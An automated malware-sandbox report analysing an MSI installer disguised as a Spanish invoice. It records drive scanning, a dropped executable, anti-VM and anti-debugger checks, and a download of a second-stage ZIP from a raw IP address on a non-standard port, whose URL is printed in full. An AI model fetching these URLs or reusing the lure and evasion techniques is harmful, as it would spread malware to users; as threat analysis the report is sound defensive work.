Loading ...

Play interactive tourEdit tour

Analysis Report SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:188715
Start date:09.11.2019
Start time:10:47:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 28s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.troj.winMSI@3/3@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .msi
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold520 - 100falsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Replication Through Removable Media1Windows Remote ManagementWinlogon Helper DLLProcess Injection1Process Injection1Credential DumpingProcess Discovery1Replication Through Removable Media1Data from Local SystemData CompressedUncommonly Used Port11
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesDLL Side-Loading1Network SniffingPeripheral Device Discovery11Remote File Copy1Data from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionRootkitInput CaptureSecurity Software Discovery11Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol11
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or InformationCredentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedRemote File Copy1
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationSystem Information Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exeJoe Sandbox ML: detected

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)Show sources
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

Networking:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4748
Source: unknownNetwork traffic detected: HTTP traffic on port 4748 -> 49739
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.6:49739 -> 35.247.208.129:4748
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /ecjay.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 35.247.208.129:4748Connection: Keep-Alive
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Source: unknownTCP traffic detected without corresponding DNS query: 35.247.208.129
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /ecjay.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 35.247.208.129:4748Connection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRE
Urls found in memory or binary dataShow sources
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://35.247.208.129:4748/ecjay.zip
Source: msiexec.exe, 00000002.00000002.4957846964.00000000000CA000.00000004.00000020.sdmpString found in binary or memory: http://35.247.208.129:4748/ecjay.zipy
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://bucatinni.com.br/ad/spain/index.php
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://ocsp.thawte.com0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://t2.symcb.com0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://tl.symcd.com0&
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://www.advancedinstaller.com0
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: http://www.componentace.com
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: https://www.thawte.com/cps0/
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiString found in binary or memory: https://www.thawte.com/repository0

System Summary:

barindex
PE file contains strange resourcesShow sources
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiBinary or memory string: OriginalFileName vs SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiBinary string: IDYESAI_OFFICE_REGOPENAI_ADDIN0.0.0.0Advanced Installer PathSoftware\Caphyon\Advanced Installer\Installation PathSoftware\Caphyon\Advanced InstallerAI_OFN_FILEPATHAI_OFN_DLG_TITLEAI_OFN_FILTERSAI_OFN_FLAGSAI_OFN_DEF_EXTAI_OFN_DIRECTORYAI_OFN_FILENAMEAI_MINJREVERSIONAI_PACKAGE_TYPEx64Intel64Software\JavaSoft\Java Runtime Environment\AI_JREVERFOUNDAI_MINJDKVERSIONSoftware\JavaSoft\Java Development Kit\AI_JDKVERFOUNDAI_COMBOBOX_DATAAI_LISTBOX_DATA\\\esc1\#\esc2\|\esc3\\esc0\esc0\\esc2#\esc3|\esc1\ERROR%sERROR_NO_VALUEERROR_DUPLICATE_ITEM%s: %sSUCCESS#\#|\|\\\%s%c%s%c%s%s%c%sSELECT * FROM `Control` WHERE `Type` = 'Bitmap'AI_SYSTEM_DPIAI_SYSTEM_DPI_SCALEAI_BITMAP_DISPLAY_MODESELECT `Argument`, `Condition` FROM `ControlEvent` WHERE `Dialog_` = 'ExitDialog' AND `Control_` = 'Finish' AND `Event` = 'DoAction' ORDER BY `Ordering`AI_AI_ViewReadmeAI_LaunchAppCTRLS3ALLSELECT `Feature` FROM `Feature`DoActionAddLocalRemoveAddSourceReinstallModeREINSTALLMODEAI_INSTALL_MODE{ED4824AF-DCE4-45A8-81E2-FC7965083634}PublicDocumentsF
Classification labelShow sources
Source: classification engineClassification label: mal52.troj.winMSI@3/3@0/1
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\reabnsJump to behavior
Detected Delphi use of System.ParamCount()Show sources
Source: Yara matchFile source: 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe, type: DROPPED
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Borland\DelphiJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
SQL strings found in memory and binary dataShow sources
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmpBinary or memory string: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRE
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E216DC0A05EC098F1073D3938A185A0
Source: unknownProcess created: C:\Users\user\AppData\Local\reabns\folatacemava.exe unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msiStatic file information: File size 1800704 > 1048576
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Branch\win\Release\custact\x86\AICustAct.pdb source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4748
Source: unknownNetwork traffic detected: HTTP traffic on port 4748 -> 49739
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Checks the free space of harddrivesShow sources
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWn
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWpX

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: KernelDebuggerInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmp, folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.drBinary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.drBinary or memory string: Shell_TrayWndS
Source: folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.drBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
10:49:07API Interceptor2x Sleep call for process: msiexec.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.msiexec.exe.47c0000.3.unpack100%AviraHEUR/AGEN.1037241Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://bucatinni.com.br/ad/spain/index.php0%Avira URL Cloudsafe
http://35.247.208.129:4748/ecjay.zipy0%Avira URL Cloudsafe
http://35.247.208.129:4748/ecjay.zip4%VirustotalBrowse
http://35.247.208.129:4748/ecjay.zip0%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://www.advancedinstaller.com00%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Unpacked PEs

      No yara matches

      Sigma Overview

      No Sigma rule has matched

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      unknownhttps://gregorreiner.topGet hashmaliciousBrowse
      • 104.28.17.202
      S_974960546330.docGet hashmaliciousBrowse
      • 116.203.228.95
      S_974960546330.docGet hashmaliciousBrowse
      • 116.203.228.95
      voVnFsOaJK.exeGet hashmaliciousBrowse
      • 124.158.10.241
      Derco.pdfGet hashmaliciousBrowse
      • 3.3.0.2
      http://buggyra.mediaGet hashmaliciousBrowse
      • 162.241.5.19
      https://slivn.com/IKSE/ZS?emzo=lyn&lin=alindblom@vivaldicap.comGet hashmaliciousBrowse
      • 112.213.89.2
      dh7UcfOpbC.exeGet hashmaliciousBrowse
      • 162.241.226.142
      https://is.gd/1cuomPGet hashmaliciousBrowse
      • 104.25.22.21
      Washingtonpost.com.htmGet hashmaliciousBrowse
      • 68.65.123.79
      JavaUpdate.exeGet hashmaliciousBrowse
      • 50.22.63.140
      FILE_10086131790_ZV.docGet hashmaliciousBrowse
      • 104.31.89.48
      sdtecdat102401.pdfGet hashmaliciousBrowse
      • 3.3.0.2
      #U266b New_VoiceAudio_538203.wavv.htmGet hashmaliciousBrowse
      • 198.23.158.61
      MOGA Pivot_v1.25_apkpure.com.apkGet hashmaliciousBrowse
      • 216.58.201.78
      Sharp.com.htmGet hashmaliciousBrowse
      • 143.95.72.225
      scpC69A.tmp.exeGet hashmaliciousBrowse
      • 3.208.14.245
